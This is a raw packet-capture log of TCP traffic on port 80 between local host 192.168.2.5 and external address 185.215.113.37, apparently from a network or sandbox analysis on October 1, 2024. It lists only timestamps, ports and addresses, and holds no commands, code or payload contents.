Oct 1, 2024 19:32:12.944845915 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.944856882 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.944863081 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.944868088 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.944904089 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.944928885 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.944952011 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.944962025 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.944971085 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.944981098 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.944991112 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.945000887 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.945007086 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.945033073 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.945050955 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.945086956 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.945097923 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.945107937 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.945117950 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.945127010 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.945137024 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.945137978 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.945154905 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.945183039 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.945192099 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.945202112 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.945211887 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.945245028 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.945261002 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.945300102 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.945311069 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.945322037 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.945338964 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.945349932 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.945352077 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.945378065 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.945389986 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.945461035 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.945472002 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.945482969 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.945492983 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.945502996 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.945503950 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.945528984 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.945549011 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.945576906 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.945588112 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.945599079 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.945607901 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.945619106 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.945627928 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.945627928 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.945651054 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.945653915 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.945663929 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.945668936 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.945674896 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.945684910 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.945697069 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.945700884 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.945719004 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.945722103 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.945734978 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.945744038 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.945745945 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.945755959 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.945765972 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.945770979 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.945796013 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.945801973 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.945812941 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.945813894 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.945822001 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.945832968 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.945848942 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.945874929 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.945914984 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.945925951 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.945935965 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.945945978 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.945955992 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.945960999 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.945985079 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.945997953 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.945998907 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.946008921 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.946021080 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.946039915 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.946060896 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.946207047 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.946252108 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.946306944 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.946352005 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.044683933 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.049751997 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.262932062 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.262973070 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.262983084 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.262993097 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.263004065 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.263014078 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.263024092 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.263027906 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.263035059 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.263045073 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.263053894 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.263056040 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.263063908 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.263084888 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.263109922 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.263200998 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.263220072 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.263231039 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.263238907 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.263266087 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.263313055 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.263322115 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.263331890 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.263343096 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.263350964 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.263375998 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.263518095 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.263528109 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.263539076 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.263557911 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.263586044 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.263607979 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.263618946 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.263623953 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.263629913 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.263645887 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.263649940 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.263653994 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.263664007 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.263669968 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.263674021 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.263684034 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.263695002 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.263719082 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.263751984 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.263761997 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.263772011 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.263788939 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.263818026 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.263839006 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.263848066 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.263856888 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.263865948 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.263875961 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.263875961 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.263885021 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.263891935 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.263923883 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.264072895 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.264121056 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.264142036 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.264152050 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.264189005 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.264230013 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.264240026 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.264249086 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.264275074 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.264288902 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.264305115 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.264314890 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.264322996 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.264333010 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.264343023 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.264349937 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.264373064 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.264385939 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.264446020 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.264456987 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.264466047 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.264473915 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.264483929 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.264489889 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.264494896 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.264518023 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.264533043 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.264569044 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.264580011 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.264589071 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.264599085 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.264609098 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.264616013 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.264617920 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.264643908 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.264663935 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.264920950 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.264966965 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.264981031 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.264990091 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.265023947 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.265058041 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.265070915 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.265079021 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.265089035 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.265110016 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.265117884 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.265144110 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.265156031 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.265166044 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.265177011 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.265187025 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.265197039 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.265207052 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.265207052 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.265217066 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.265223980 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.265248060 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.265261889 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.265285015 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.265295029 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.265304089 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.265312910 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.265322924 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.265327930 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.265356064 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.265364885 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.265404940 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.265414953 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.265424013 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.265433073 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.265441895 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.265448093 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.265453100 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.265460968 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.265470982 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.265471935 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.265480042 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.265490055 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.265511036 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.265522957 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.265546083 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.265557051 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.265564919 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.265573978 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.265583992 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.265589952 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.265614033 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.265625954 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.265636921 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.265640974 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.265645981 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.265655994 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.265660048 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.265666962 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.265681028 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.265703917 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.265764952 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.265774965 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.265779972 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.265790939 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.265795946 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.265805006 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.265810013 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.265815020 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.265815973 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.265829086 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.265834093 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.265841961 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.265851021 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.265862942 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.265881062 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.266021967 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.266031027 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.266041040 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.266050100 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.266060114 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.266068935 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.266069889 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.266079903 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.266088963 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.266089916 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.266099930 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.266107082 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.266110897 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.266134977 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.266156912 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.350308895 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.350323915 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.350328922 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.350333929 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.350338936 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.350342035 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.350347996 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.350353956 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.350379944 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.350389004 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.350394011 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.350398064 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.350402117 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.350406885 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.350465059 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.350497961 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.350507975 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.350511074 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.350517988 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.350544930 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.350574970 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.350611925 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.350626945 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.350636959 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.350646973 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.350651979 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.350657940 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.350667953 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.350678921 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.350681067 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.350689888 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.350711107 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.350747108 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.350764990 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.350774050 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.350775003 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.350785017 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.350795984 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.350796938 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.350805044 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.350819111 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.350821972 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.350831985 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.350841045 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.350847006 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.350852013 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.350862980 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.350881100 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.350903988 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.350904942 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.350914001 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.350928068 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.350938082 CEST	80	49704	185.215.113.37	192.168.2.5
